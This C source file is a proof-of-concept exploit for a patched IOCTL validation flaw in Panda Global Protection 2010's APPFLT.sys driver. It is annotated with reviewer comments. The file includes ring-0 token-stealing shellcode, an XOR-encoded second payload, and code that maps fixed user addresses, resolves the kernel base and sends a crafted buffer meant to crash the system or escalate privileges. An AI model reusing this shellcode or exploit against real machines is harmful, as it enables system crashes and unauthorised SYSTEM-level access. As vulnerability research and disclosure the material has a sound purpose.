#include <windows.h>
#include <ddk/ntapi.h>
#include <tlhelp32.h>

#include <conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* SYSTEM_INFORMATION_CLASS value for SystemModuleInformation: makes
 * ZwQuerySystemInformation() return the loaded kernel-module list
 * (Count + Module[] array) that KernelGetModuleBase() below walks. */
#define SystemModuleInfo 11
/*
|
|
Program : Panda Global Protection 2010 (3.01.00)
|
|
Homepage : http://www.pandasecurity.com
|
|
Discovery : 2010/04/09
|
|
Author Contacted : 2010/07/15
|
|
Status of vuln : Patched !
|
|
Found by : Heurs
|
|
This Advisory : Heurs
|
|
Contact : s.leberre@sysdream.com
|
|
|
|
|
|
//----- Application description
|
|
|
|
|
|
Antivirus Global Protection 2010 is the most complete product, with everything
|
|
you need to protect your computer and information. It protects you from viruses,
|
|
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
|
|
threats. The anti-spam engine will keep your inbox free from junk mail while the
|
|
Parental Control feature will keep your family safe when using the Internet. You
|
|
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
|
|
online (5GB free space available) and restore them in case of accidental loss or
|
|
damage. And thanks to the most innovative and new detection technologies and improved
|
|
Collective Intelligence, the solution is now much faster than previous versions.
|
|
|
|
//----- Description of vulnerability
|
|
|
|
The APPFLT.sys driver does not validate the integer fields of the input buffer
of one of its IOCTLs. Changing a single DWORD in that buffer is enough to make
the driver raise an unhandled kernel-mode exception from an unprivileged
user-mode process (i.e. a system crash).

The exploit as published is not functional, but with a little more work the bug
could be turned into a local privilege escalation.
|
|
|
|
//----- Credits
|
|
|
|
http://www.sysdream.com
|
|
http://www.hackinparis.com/
|
|
http://ghostsinthestack.org
|
|
|
|
s.leberre at sysdream dot com
|
|
heurs at ghostsinthestack dot org
|
|
|
|
//----- Greetings
|
|
|
|
Mysterie
|
|
|
|
*/
/*
 * Ring-0 payload. main() copies it verbatim (sizeof, i.e. 91 bytes including
 * the trailing NUL) to the fixed user-mode page at 0x19653420.
 *
 * Decoding the bytes as 32-bit x86 gives:
 *   xor esi,esi ; xor edi,edi
 *   mov eax, fs:[0x124]            ; current thread (KPCR), XP-era offset
 *   mov eax, [eax+0x44]            ; -> owning process
 *   add eax, 0x88                  ; -> process list link
 *   mov edx, eax
 * loop:
 *   mov ebx, [eax-4]               ; process id
 *   cmp ebx, 0x41414141 ; jne +2 ; mov esi, eax   ; target PID placeholder
 *   cmp ebx, 4          ; jne +2 ; mov edi, eax   ; PID 4 (System)
 *   mov edx, esi ; and edx, edi ; test edx, edx ; jnz found
 *   mov eax, [eax] ; cmp eax, edx ; jne loop ; jmp end
 * found:
 *   mov eax, edi ; mov ecx, 0x40 ; add eax, ecx ; mov eax, [eax]   ; read +0xC8
 *   mov ebx, esi ; mov [ecx+ebx], eax                               ; write +0xC8
 * end:
 *   mov edx, 0x11111111 ; mov ecx, 0x22222222   ; sysexit EIP / ESP placeholders
 *   mov eax, 0x3B ; mov fs, ax ; sysexit
 *
 * This is the shape of a token-stealing stub (copy the System process's
 * token pointer into the target process). The structure offsets (fs:0x124,
 * +0x44, +0x84/+0x88, +0xC8) look like 32-bit Windows XP values -- inferred
 * from the constants, not stated by the author. NOTE(review): the three
 * placeholders 0x41414141 / 0x11111111 / 0x22222222 are never patched by
 * main(), which is consistent with the header's "exploit isn't functional".
 */
char ShellcodeMaster[] =
"\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";
/*
 * Second, XOR-encoded payload. It is NOT referenced anywhere in this file
 * (main() only copies ShellcodeMaster), so as published it is dead data.
 *
 * The first 24 bytes match the usual fnstenv-based XOR decoder stub:
 *   sub ecx,ecx ; sub ecx,-0x23 ; fldz ; fnstenv [esp-0xC] ; pop ebx
 *   xor dword [ebx+0x13], 0xB81DF315 ; sub ebx,-4 ; loop
 * so the remaining 140 bytes would be 0x23 DWORDs of body encoded with key
 * 0xB81DF315 -- inferred from the bytes, not documented by the author.
 */
char RealShellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
"\x15\xf3\x1d\xb8";
/*
 * One element of the module array returned by
 * ZwQuerySystemInformation(SystemModuleInfo).
 *
 * Field names are the author's. The layout (six 4-byte fields, two USHORTs
 * and a 256-byte path) corresponds to the structure usually documented as
 * RTL_PROCESS_MODULE_INFORMATION -- assumed from the layout, confirm against
 * the SDK. KernelGetModuleBase() indexes the ddk header's Module[] array
 * through this type, so any size mismatch between the two would misalign
 * every entry after the first.
 */
typedef struct _SYSTEM_MODULE_ENTRY
{
ULONG Unused;                 /* (documented layout: Section handle) */
ULONG Always0;                /* (documented layout: MappedBase) */
PVOID ModuleBaseAddress;      /* kernel-mode load address; returned by KernelGetModuleBase() */
ULONG ModuleSize;
ULONG Unknown;                /* (documented layout: Flags) */
ULONG ModuleEntryIndex;       /* (documented layout: two USHORT order indices) */
USHORT ModuleNameLength;      /* (documented layout: LoadCount) */
USHORT ModuleNameOffset;      /* offset of the bare file name inside ModuleName */
CHAR ModuleName [256];        /* full path of the image, NUL-terminated */
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
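/*
 * Locate the ".data" section of a PE image mapped at ImageBase.
 *
 * ImageBase is the base of an image mapped into this process (main() gets it
 * from LoadLibrary() on the kernel binary), so the headers are read directly.
 *
 * Returns the section's VirtualAddress (an RVA, relative to the image base),
 * or 0 when ImageBase is NULL, the DOS/NT signatures do not match, or no
 * section is named ".data".
 */
DWORD GetDataSection(HANDLE ImageBase){
    const BYTE *base = (const BYTE *) ImageBase;
    const IMAGE_DOS_HEADER *dosHdr;
    const IMAGE_NT_HEADERS *ntHdr;
    const IMAGE_SECTION_HEADER *secHdr;
    WORD i;

    /* LoadLibrary() can fail; the original dereferenced NULL here. */
    if (base == NULL) {
        return 0;
    }

    dosHdr = (const IMAGE_DOS_HEADER *) base;
    if (dosHdr->e_magic != IMAGE_DOS_SIGNATURE) {   /* "MZ" */
        return 0;
    }

    /* e_lfanew is a byte offset: index a BYTE pointer, not the HANDLE (void*). */
    ntHdr = (const IMAGE_NT_HEADERS *) (base + dosHdr->e_lfanew);
    if (ntHdr->Signature != IMAGE_NT_SIGNATURE) {   /* "PE\0\0" */
        return 0;
    }

    /*
     * The section table follows the optional header, whose real size is
     * FileHeader.SizeOfOptionalHeader; IMAGE_FIRST_SECTION honours that
     * instead of assuming sizeof(IMAGE_NT_HEADERS).
     */
    secHdr = IMAGE_FIRST_SECTION(ntHdr);
    for (i = 0; i < ntHdr->FileHeader.NumberOfSections; i++, secHdr++) {
        /*
         * Name is IMAGE_SIZEOF_SHORT_NAME (8) bytes and is NOT NUL-terminated
         * when all 8 are used, so a plain strcmp() could read past it.
         */
        if (strncmp((const char *) secHdr->Name, ".data", IMAGE_SIZEOF_SHORT_NAME) == 0) {
            return secHdr->VirtualAddress;
        }
    }

    return 0;
}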
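/*
 * Resolve the kernel-mode load address of a loaded kernel image by file name.
 *
 * Uses ZwQuerySystemInformation(SystemModuleInfo) to fetch the loaded-module
 * list (on the XP-era targets of this PoC that class is readable from an
 * unprivileged process) and compares pModuleName case-insensitively with
 * each entry's file name (ModuleName + ModuleNameOffset skips the path).
 *
 * pModuleName: NUL-terminated file name, e.g. "ntoskrnl.exe".
 *
 * Returns the entry's ModuleBaseAddress, or NULL when pModuleName is NULL,
 * the query fails, the allocation fails, or the module is not loaded.
 */
PVOID KernelGetModuleBase(PCHAR pModuleName)
{
    PVOID pModuleBase = NULL;
    PSYSTEM_MODULE_INFORMATION pInfo;
    ULONG cbNeeded = 0;
    ULONG cbBuffer;
    NTSTATUS status;

    if (pModuleName == NULL) {
        return NULL;
    }

    /*
     * Size probe: with a NULL buffer the call fails with
     * STATUS_INFO_LENGTH_MISMATCH and stores the required size in cbNeeded.
     * (The original passed &cbNeeded itself as the buffer, aliasing the
     * length variable with the output buffer.)
     */
    (void) ZwQuerySystemInformation(SystemModuleInfo, NULL, 0, &cbNeeded);
    if (cbNeeded == 0) {
        return NULL;
    }

    /*
     * Drivers may load between the two calls, so allocate twice the reported
     * size (as the original did) so the second call still fits. calloc()
     * zero-fills, so an unexpectedly short answer never yields garbage names.
     */
    cbBuffer = cbNeeded * 2;
    pInfo = (PSYSTEM_MODULE_INFORMATION) calloc(1, cbBuffer);
    if (pInfo == NULL) {
        return NULL;
    }

    status = ZwQuerySystemInformation(SystemModuleInfo, pInfo, cbBuffer, &cbNeeded);
    if (NT_SUCCESS(status)) {
        /* The ddk header's Module[] entries are viewed through the local struct. */
        PSYSTEM_MODULE_ENTRY entry = (PSYSTEM_MODULE_ENTRY) pInfo->Module;
        ULONG i;

        for (i = 0; i < pInfo->Count; i++) {
            const char *fileName = entry[i].ModuleName + entry[i].ModuleNameOffset;

            if (_stricmp(fileName, pModuleName) == 0) {
                pModuleBase = entry[i].ModuleBaseAddress;
                break;
            }
        }
    }

    free(pInfo);
    return pModuleBase;
} // end KernelGetModuleBase()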
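/*
 * Entry point: reproduces the APPFLT.sys IOCTL crash described in the header
 * comment. Run it only on a disposable test VM -- a successful trigger is a
 * kernel-mode exception (BSOD).
 *
 * What the code does, in order:
 *   1. Opens the driver's control device "\\.\AppFlt".
 *   2. Commits two fixed user-mode regions -- 64 KiB at 0x00110000 and one
 *      page at 0x19653420 -- and copies ShellcodeMaster to the latter. The
 *      request buffer is mostly filled with those two addresses (0x00112200
 *      and 0x19653420), presumably so an unchecked kernel dereference lands
 *      in attacker-controlled memory; the advisory itself says the exploit
 *      is not functional, and nothing here patches the 0x41414141 /
 *      0x11111111 / 0x22222222 placeholders inside ShellcodeMaster.
 *   3. Resolves the kernel base with KernelGetModuleBase() ("ntoskrnl.exe",
 *      else "ntkrnlpa.exe") and derives KernelPointerDeref from it.
 *   4. Stores (KernelPointerDeref - 0x750) ^ 0x19653420 at Crashing[469] and
 *      writes the 0x00112200 marker six times around 0x001129f9.
 *   5. Sends IOCTL 0x06660E1C with the buffer.
 *
 * Changes from the original: every CreateFile / VirtualAlloc / LoadLibrary
 * result is checked (the original wrote to fixed addresses and used an
 * invalid handle on failure), the two long constant runs of the request
 * buffer are produced by loops instead of ~700 literal lines, the unused
 * locals and the dead LoadLibrary("ntoskrnl.exe") are gone, and the handle
 * is printed with %p. The bytes handed to the driver are unchanged.
 *
 * Returns 0 after the request was sent, 1 if a prerequisite step fails.
 */
int __cdecl main(int argc, char* argv[])
{
    /*
     * Request buffer layout (773 DWORDs = 3092 bytes):
     *   [0..55]    fixed header: filler values, 0x001cfdea, 0x002dc6c0,
     *              0xa8, then what looks like a UTF-16LE device path
     *              ending in "WebProxy.exe" (meaning of the fields is not
     *              documented in the advisory)
     *   [56..264]  0x00112200   -- inside the 0x00110000 region
     *   [265..772] 0x19653420   -- address of the ShellcodeMaster copy
     * Crashing[469] lies in the last run and is overwritten below.
     */
    enum { CRASHING_DWORDS = 773, FIRST_MARKER = 56, FIRST_SHELLADDR = 265 };
    DWORD Crashing[CRASHING_DWORDS] = {
        0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
        0xeeeeeeee, 0x11111111, 0x001cfdea, 0x002dc6c0,
        0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
        0x005c0065, 0x00610048, 0x00640072, 0x00690064,
        0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
        0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
        0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
        0x00610050, 0x0064006e, 0x00200061, 0x00650053,
        0x00750063, 0x00690072, 0x00790074, 0x0050005c,
        0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
        0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
        0x00630065, 0x00690074, 0x006e006f, 0x00320020,
        0x00310030, 0x005c0030, 0x00650057, 0x00500062,
        0x006f0072, 0x00790078, 0x0065002e, 0x00650078
        /* remaining elements are filled by the loops below */
    };
    char out[sizeof(Crashing)];
    const DWORD marker = 0x00112200;            /* same value as Crashing[60] in the original */
    BYTE *const markerDst = (BYTE *) 0x001129f9; /* inside the 0x00110000 region */
    DWORD NombreByte = 0;
    HANDLE hDevice;
    LPVOID region;
    DWORD KernelImageBase;
    DWORD KernelPointerDeref;
    size_t i;

    (void) argc;
    (void) argv;

    for (i = FIRST_MARKER; i < FIRST_SHELLADDR; i++) {
        Crashing[i] = 0x00112200;
    }
    for (i = FIRST_SHELLADDR; i < CRASHING_DWORDS; i++) {
        Crashing[i] = 0x19653420;
    }

    printf("Local Privilege Escalation - Panda Global Protection 2010 (3.01.00)\n\n");

    hDevice = CreateFile("\\\\.\\AppFlt", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("CreateFile(\\\\.\\AppFlt) failed: %lu\n", GetLastError());
        return 1;
    }

    /*
     * Reserve and commit in one call (the original did two unchecked steps).
     * If either fixed address is already in use, stop instead of writing
     * through it.
     */
    region = VirtualAlloc((void *) 0x00110000, 0x10000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (region == NULL) {
        printf("VirtualAlloc(0x00110000) failed: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }

    region = VirtualAlloc((void *) 0x19653420, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (region == NULL) {
        printf("VirtualAlloc(0x19653420) failed: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }
    memcpy((void *) 0x19653420, ShellcodeMaster, sizeof(ShellcodeMaster));

    KernelImageBase = (DWORD) KernelGetModuleBase("ntoskrnl.exe");
    if (KernelImageBase != 0) {
        /*
         * NOTE(review): unlike the PAE branch below, no .data RVA is added
         * here -- kept as the author wrote it; confirm this is intended.
         */
        KernelPointerDeref = KernelImageBase + 0x3C;
    } else {
        HMODULE hKrnl;
        DWORD dataRva;

        KernelImageBase = (DWORD) KernelGetModuleBase("ntkrnlpa.exe");
        if (KernelImageBase == 0) {
            printf("Could not locate ntoskrnl.exe or ntkrnlpa.exe in the module list\n");
            CloseHandle(hDevice);
            return 1;
        }

        /* Map the kernel file into this process so its section table can be parsed. */
        hKrnl = LoadLibrary("ntkrnlpa.exe");
        if (hKrnl == NULL) {
            printf("LoadLibrary(ntkrnlpa.exe) failed: %lu\n", GetLastError());
            CloseHandle(hDevice);
            return 1;
        }
        dataRva = GetDataSection((HANDLE) hKrnl);
        FreeLibrary(hKrnl);
        if (dataRva == 0) {
            printf("No .data section found in ntkrnlpa.exe\n");
            CloseHandle(hDevice);
            return 1;
        }
        KernelPointerDeref = KernelImageBase + dataRva + 0x3C;
    }

    /*
     * The kernel pointer is XOR-ed with the same constant that fills the
     * tail of the buffer; the advisory does not explain the encoding.
     */
    Crashing[469] = (KernelPointerDeref - 0x750) ^ 0x19653420;

    /* Place the 0x00112200 marker at 0x001129f9, 4 bytes at a time. */
    memcpy(markerDst + 0x00, &marker, 4);
    memcpy(markerDst + 0x04, &marker, 4);
    memcpy(markerDst + 0x08, &marker, 4);
    memcpy(markerDst + 0x0C, &marker, 4);
    memcpy(markerDst + 0x10, &marker, 4);
    /* +0x16 (not +0x14) is what the original wrote; kept -- TODO confirm it is not a typo. */
    memcpy(markerDst + 0x16, &marker, 4);

    if (!DeviceIoControl(hDevice, 0x06660E1C, Crashing, sizeof(Crashing), out, sizeof(Crashing), &NombreByte, NULL)) {
        /* Informational only: a driver fault would never return here. */
        printf("DeviceIoControl failed: %lu\n", GetLastError());
    }

    printf("Sploit Send.\nhDevice = %p\n", (void *) hDevice);
    CloseHandle(hDevice);
    getch();
    return 0;
}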